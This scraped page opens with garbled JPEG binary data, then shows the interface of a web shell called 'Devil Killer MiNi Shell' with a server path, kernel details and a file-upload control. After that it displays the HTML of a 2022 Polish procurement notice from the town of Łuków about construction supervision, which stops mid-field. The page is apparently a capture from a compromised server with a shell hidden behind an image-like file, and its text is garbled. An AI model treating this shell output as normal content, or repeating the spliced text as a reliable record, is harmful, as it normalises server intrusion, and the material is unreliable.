JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220412/0011939101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PEŁNIENIE NADZORÓW INWESTORSKICH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Łuków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.lukow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lukow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PEŁNIENIE NADZORÓW INWESTORSKICH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9709f223-ba3f-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00119391</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017210/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Pełnienie nadzorów inwestorskich w branży drogowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/um.lukow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami, w tym przekazanie wszelkich<br/>oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się: za pośrednictwem Platformy SmartPZP zwanej dalej Platformą<br/>pod adresem: https://portal.smartpzp.pl/um.lukow<br/>Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji w postaci elektronicznej, przyjmuje się datę ich wczytania na<br/>Platformie.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">INFORMACJE O ŚRODKACH<br/>KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE KOMUNIKOWAŁ SIĘ Z<br/>WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH SPORZĄDZANIA,<br/>WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ dostępne są w pkt 18 swz.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Łuków, ul. Piłsudskiego 17 21-400 Łuków, sekretariat@um.lukow.pl<br/>	inspektorem ochrony danych w Urzędzie Miasta Łuków jest Pan Łukasz Kuśmierczak, lkusmierczak@um.lukow.pl, zastępcą Inspektora Ochrony Danych jest Alicja Miszta, adres e-mail: iod@um.lukow.pl. <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na zamawiającym jako jednostce sektora finansów publicznych.<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14. RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 6.1.	Część 1 Nazwa: Pełnienie nadzoru inwestorskiego w ramach zadania Budowa infrastruktury na terenie inwestycyjnym przy ul. Strzelniczej w mieście Łuków<br/>6.1.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu nadzoru inwestorskiego przez zespół osób posiadających uprawnienia budowlane (wymagane ustawą z dnia 7 lipca 1994 Prawo Budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów) do pełnienia samodzielnej funkcji technicznej w budownictwie w branży:<br/>	drogowej, specjalność inżynieryjna – drogowa,<br/>	sanitarnej, specjalność w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>	elektrycznej, specjalność instalacyjna w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych,<br/>przy założeniu iż osoba posiadająca uprawnienia budowlane w specjalności inżynieryjnej drogowej pełnić będzie funkcję inspektora wiodącego tzn. przewodniczyć będzie zespołowi uprawnionych osób do pełnienia nadzoru inwestorskiego.<br/>6.1.2.	Przedmiot zamówienia dotyczy pełnienia nadzoru inwestorskiego nad wykonaniem robót budowlanych realizowanych w oparciu o:<br/>	projekt budowlany zatwierdzony decyzją pozwolenia na budowę Nr 713/2017 z dnia 07.09.2017 r.<br/>	projekt budowlany zatwierdzony zgłoszeniem budowy Nr B.6743.43.2022.PT z dnia 20.01.2022 r.<br/>stanowiących budowę infrastruktury na terenie inwestycyjnym przy ul. Strzelniczej <br/>w mieście Łuków<br/>6.1.3.	W ramach określonego przedmiotu Zamówienia do obowiązków uprawnionych osób pełniących funkcje inspektora nadzoru w stosownych specjalnościach budowlanych należy:<br/>	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem oraz przepisami i zasadami wiedzy technicznej,<br/>	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,<br/>	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,<br/>	uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania,<br/>	potwierdzenie faktyczne wykonanych robót oraz usunięcia wad, a także na żądanie inwestora kontrolowanie rozliczeń budowy,<br/>	uczestniczenie w radach budowy odbywających się nie rzadziej jak dwa razy w miesiącu,<br/>	uczestniczenie w przeglądach gwarancyjnych oraz w naradach i konsultacjach w przypadku wystąpienia usterek lub wad stwierdzonych w przedmiotowym zakresie wykonanych robót budowlanych.<br/>6.1.4.	Szczegółowy zakres rzeczowy realizacji robót budowlanych dla w/w zakresu obejmuje:<br/>6.1.5.	Budowa drogi, w tym:<br/>	roboty pomiarowe i przygotowawcze<br/>	roboty ziemne<br/>	profilowanie podłoża, wykonanie nasypów, podbudowy betonowej i nawierzchni z kostki brukowej gr. 10cm – 5970 m2<br/>	wykonanie cieku z kostki brukowej gr. 8 cm – 308m2<br/>	ustawienie krawężników 20x30x100cm <br/>	ustawienie krawężników 20x22x100cm<br/>	ustawienie krawężników 20x30x30cm <br/>	regulacja urządzeń infrastruktury technicznej<br/>	oznakowanie pionowe<br/>	zagospodarowanie terenu w zakresie zieleni<br/>	roboty porządkowe<br/>6.1.6.	Budowa oświetlenia drogowego, w tym:<br/>	roboty przygotowawcze, pomiarowe i ziemne<br/>	budowa linii kablowej oświetlenia drogowego YAKXS 4x35mm2 o długości <br/>trasy - 875m<br/>	montaż słupów oświetleniowych z ustojami i wysięgnikami – 26 szt.<br/>	montaż opraw oświetleniowych – 26 szt.<br/>	montaż zabezpieczeń, sterowania<br/>	badania i pomiary<br/>	roboty porządkowe<br/>6.1.7.	Budowa kanalizacji deszczowej, w tym:<br/>	roboty przygotowawcze, pomiarowe i ziemne<br/>	budowa kolektora kanalizacji deszczowej, osadnika wraz z separatorem koalesencyjnym<br/>	budowa zbiornika infiltracyjno chłonno odparowującego wraz z ogrodzeniem <br/>o pow. 482m2<br/>	budowa przykanalików<br/>	budowa studni kanalizacyjnych i wpustów z osadnikiem<br/>	ułożenie rur kanałowych o długości - 752m<br/>	roboty porządkowe<br/>6.1.8.	Budowa sieci kanalizacji sanitarnej, w tym:<br/>	roboty przygotowawcze, pomiarowe i ziemne<br/>	budowa prefabrykowanej przepompowni ścieków z polimerobetonu DN 1200<br/>	budowa zasilania przepompowni ścieków o długości trasy - 85m<br/>	budowa sieci kanalizacji sanitarnej z rękawami przyłączeniowymi – łącznie 451,4m<br/>	budowa żelbetonowych studni rewizyjnych ϕ 1000 – 13 kpl.<br/>	roboty porządkowe	<br/>6.1.9.	Budowa sieci wodociągowej, w tym:<br/>	roboty przygotowawcze, pomiarowe i ziemne<br/>	budowa sieci wodociągowej z rękawami przyłączeniowymi – łącznie 505,50m<br/>	budowa hydrantów ppoż – 4 szt.<br/>	roboty porządkowe<br/>6.1.10.	Wartość wykonania robót budowlanych (netto) określona na podstawie złożonej najkorzystniejszej oferty cenowej w postępowaniu przetargowym na wykonanie robót przedmiotowego zadania wynosi łącznie: 3 811 883,80 zł (brutto).<br/>6.1.11.	Kompletna dokumentacja techniczna dla zakresu realizacji przedsięwzięcia objętego przedmiotem pełnienia nadzoru inwestorskiego dostępna jest na stronie urzędu Miasta Łuków pod linkiem: https://portal.smartpzp.pl/um.lukow </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40288,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru inwestorskiego branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 6.2.	Część 2 Nazwa: Pełnienie nadzoru inwestorskiego w ramach zadania Remont dróg gminnych nr 102488L ul. Spokojna, nr 102371L ul. Cmentarna w m. Łuków.<br/>6.2.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu nadzoru inwestorskiego przez zespół osób posiadających uprawnienia budowlane (wymagane ustawą z dnia 7 lipca 1994 Prawo Budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów) do pełnienia samodzielnej funkcji technicznej w budownictwie w branży drogowej, specjalność inżynieryjna – drogowa.<br/>6.2.2.	Przedmiot zamówienia dotyczy pełnienia nadzoru inwestorskiego nad wykonaniem robót budowlanych realizowanych w oparciu o projekt techniczny zatwierdzony zgłoszeniem Nr B.6743.635.2021.RW z dnia 19.08.2021 r. stanowiących remont dróg gminnych nr 102488L ul. Spokojna, nr 102371L ul. Cmentarna w m. Łuków.<br/>6.2.3.	W ramach określonego przedmiotu Zamówienia do obowiązków uprawnionej osoby pełniącej funkcje inspektora nadzoru w stosownej specjalności budowlanej należy:<br/>	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji <br/>z projektem oraz przepisami i zasadami wiedzy technicznej,<br/>	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, <br/>a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,<br/>	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,<br/>	uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania,<br/>	potwierdzenie faktyczne wykonanych robót oraz usunięcia wad, a także na żądanie inwestora kontrolowanie rozliczeń budowy,<br/>	uczestniczenie w radach budowy odbywających się nie rzadziej jak dwa razy w miesiącu,<br/>	uczestniczenie w przeglądach gwarancyjnych oraz w naradach i konsultacjach w przypadku wystąpienia usterek lub wad stwierdzonych w przedmiotowym zakresie wykonanych robót budowlanych<br/>6.2.4.	Szczegółowy zakres rzeczowy realizacji robót budowlanych dla w/w zakresu obejmuje remont dróg gminnych na długości 448,33m i szerokości jezdni 5,6-6,0m w zakresie:<br/>	robót przygotowawczych i rozbiórkowych (m.in. rozebranie krawężników betonowych, ław betonowych, mechaniczne sfrezowanie oraz oczyszczenie nawierzchni bitumicznej);<br/>	wykonanie ławy betonowej z oporem pod krawężniki;<br/>	ustawienie krawężników betonowych na ławie betonowej z oporem;<br/>	wykonanie nawierzchni bitumicznej z mieszanek mineralno – bitumicznych asfaltowych stanowiącej warstwę wyrównawczą grubości średnio 3,0 cm + warstwa ścieralna gr. 4,0cm;<br/>	wykonania odwodnienia powierzchniowego drogi poprzez zastosowanie odpowiednich spadków podłużnych i poprzecznych;<br/>	wymiana i regulacja wpustów ulicznych, włazów kanalizacyjnych oraz pozostałych pokryw studziennych;<br/>	wykonanie projektów tymczasowej organizacji ruchu oraz jego zastosowanie<br/>	wykonanie i montaż tablicy informacyjnej (2 szt.) o dofinansowaniu ze środków Rządowego Funduszu Rozwoju Dróg wg przekazanego projektu.<br/>6.2.5.	Wartość szacunkowa wykonania robót budowlanych (netto) określona na podstawie kosztorysu w postępowaniu przetargowym na wykonanie robót przedmiotowego zadania wynosi łącznie: 523 780,40 zł (brutto).<br/>6.2.6.	Kompletna dokumentacja techniczna dla zakresu realizacji przedsięwzięcia objętego przedmiotem pełnienia nadzoru inwestorskiego dostępna jest na stronie urzędu Miasta Łuków pod linkiem: : https://portal.smartpzp.pl/um.lukow </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7920,58 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru inwestorskiego branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający 